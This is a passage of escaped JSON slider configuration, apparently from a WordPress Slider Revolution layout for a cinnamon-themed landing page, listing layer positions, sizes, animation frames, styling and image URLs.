establi...\",\"uid\":10,\"size\":{\"width\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"348px\",\"e\":true},\"t\":{\"v\":\"348px\",\"e\":true},\"m\":{\"v\":\"348px\"}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"originalWidth\":\"348px\"},\"position\":{\"x\":{\"d\":{\"v\":\"249px\",\"e\":true},\"n\":{\"v\":\"-327px\",\"e\":true},\"t\":{\"v\":\"249px\",\"e\":true},\"m\":{\"v\":\"249px\"}},\"y\":{\"d\":{\"v\":\"749px\",\"e\":true},\"n\":{\"v\":\"313px\",\"e\":true},\"t\":{\"v\":\"612px\",\"e\":true},\"m\":{\"v\":\"612px\"}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":14,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\"},\"11\":{\"text\":\"Image 11\",\"alias\":\"Image 11\",\"uid\":11,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/landing-cimet-img-4-2.png\",\"imageId\":3556},\"size\":{\"width\":{\"d\":{\"v\":\"495px\",\"e\":true},\"n\":{\"v\":\"395px\",\"e\":true},\"t\":{\"v\":\"395px\",\"e\":true},\"m\":{\"v\":\"395px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"329px\",\"e\":true},\"n\":{\"v\":\"263px\",\"e\":true},\"t\":{\"v\":\"263px\",\"e\":true},\"m\":{\"v\":\"263px\",\"e\":true}},\"originalWidth\":600,\"originalHeight\":399,\"aspectRatio\":{\"d\":{\"v\":1.503759398496240518028344013146124780178070068359375},\"n\":{\"v\":1.503759398496240518028344013146124780178070068359375},\"t\":{\"v\":1.503759398496240518028344013146124780178070068359375},\"m\":{\"v\":1.503759398496240518028344013146124780178070068359375}}},\"position\":{\"x\":{\"d\":{\"v\":\"14px\",\"e\":true},\"n\":{\"v\":\"147px\",\"e\":true},\"t\":{\"v\":\"-24px\",\"e\":true},\"m\":{\"v\":\"-578px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"43px\",\"e\":true},\"n\":{\"v\":\"-279px\",\"e\":true},\"t\":{\"v\":\"-35px\",\"e\":true},\"m\":{\"v\":\"347px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"e\":true}},\"zIndex\":15,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":15,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeIn\",\"speed\":1000,\"start\":9000,\"startRelative\":8090,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\"},\"13\":{\"text\":\"Image 13\",\"alias\":\"Image 13\",\"uid\":13,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/03\\/landing-cinnamon-slider-2.png\",\"imageId\":4270},\"size\":{\"width\":{\"d\":{\"v\":\"709px\",\"e\":true},\"n\":{\"v\":\"468px\",\"e\":true},\"t\":{\"v\":\"371px\",\"e\":true},\"m\":{\"v\":\"371px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"830px\",\"e\":true},\"n\":{\"v\":\"547px\",\"e\":true},\"t\":{\"v\":\"434px\",\"e\":true},\"m\":{\"v\":\"434px\",\"e\":true}},\"originalWidth\":734,\"originalHeight\":843,\"aspectRatio\":{\"d\":{\"v\":0.87069988137603793187935252717579714953899383544921875},\"n\":{\"v\":0.87069988137603793187935252717579714953899383544921875},\"t\":{\"v\":0.87069988137603793187935252717579714953899383544921875},\"m\":{\"v\":0.87069988137603793187935252717579714953899383544921875}}},\"position\":{\"x\":{\"d\":{\"v\":\"228px\",\"e\":true},\"n\":{\"v\":\"354px\",\"e\":true},\"t\":{\"v\":\"116px\",\"e\":true},\"m\":{\"v\":\"496px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"155px\",\"e\":true},\"n\":{\"v\":\"-59px\",\"e\":true},\"t\":{\"v\":\"371px\",\"e\":true},\"m\":{\"v\":\"237px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":16,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":16,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8090,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"action\":[{\"tooltip_event\":\"click\",\"action\":\"link\",\"image_link\":\"http:\\/\\/succulents.select-themes.com\\/home-6\\/\",\"link_open_in\":\"_blank\",\"link_follow\":\"follow\",\"jump_to_slide\":\"\",\"scrollunder_offset\":\"\",\"action_easing\":\"Linear.easeNone\",\"action_speed\":\"\",\"actioncallback\":\"\",\"layer_target\":\"backgroundvideo\",\"link_type\":\"a\",\"action_delay\":\"\",\"toggle_layer_type\":\"visible\",\"toggle_class\":\"\"}],\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\"},\"14\":{\"text\":\"Image 14\",\"alias\":\"Image 14\",\"uid\":14,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/nova-vocka1.png\",\"imageId\":4611},\"size\":{\"width\":{\"d\":{\"v\":\"400px\",\"e\":true},\"n\":{\"v\":\"304px\",\"e\":true},\"t\":{\"v\":\"237px\",\"e\":true},\"m\":{\"v\":\"237px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"290px\",\"e\":true},\"n\":{\"v\":\"220px\",\"e\":true},\"t\":{\"v\":\"172px\",\"e\":true},\"m\":{\"v\":\"172px\",\"e\":true}},\"originalWidth\":400,\"originalHeight\":290,\"aspectRatio\":{\"d\":{\"v\":1.37931034482758629877707790001295506954193115234375},\"n\":{\"v\":1.37931034482758629877707790001295506954193115234375},\"t\":{\"v\":1.37931034482758629877707790001295506954193115234375},\"m\":{\"v\":1.37931034482758629877707790001295506954193115234375}}},\"position\":{\"x\":{\"d\":{\"v\":\"-190px\",\"e\":true},\"n\":{\"v\":\"12px\",\"e\":true},\"t\":{\"v\":\"-178px\",\"e\":true},\"m\":{\"v\":\"-447px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"398px\",\"e\":true},\"n\":{\"v\":\"343px\",\"e\":true},\"t\":{\"v\":\"376px\",\"e\":true},\"m\":{\"v\":\"255px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":17,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":17,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"bottom\"},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"-20deg\",\"rotationY\":\"-20deg\",\"rotationZ\":\"0deg\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1500,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1500,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1480,\"start\":9000,\"startRelative\":7490,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\"},\"15\":{\"text\":\"Image 15\",\"alias\":\"Image 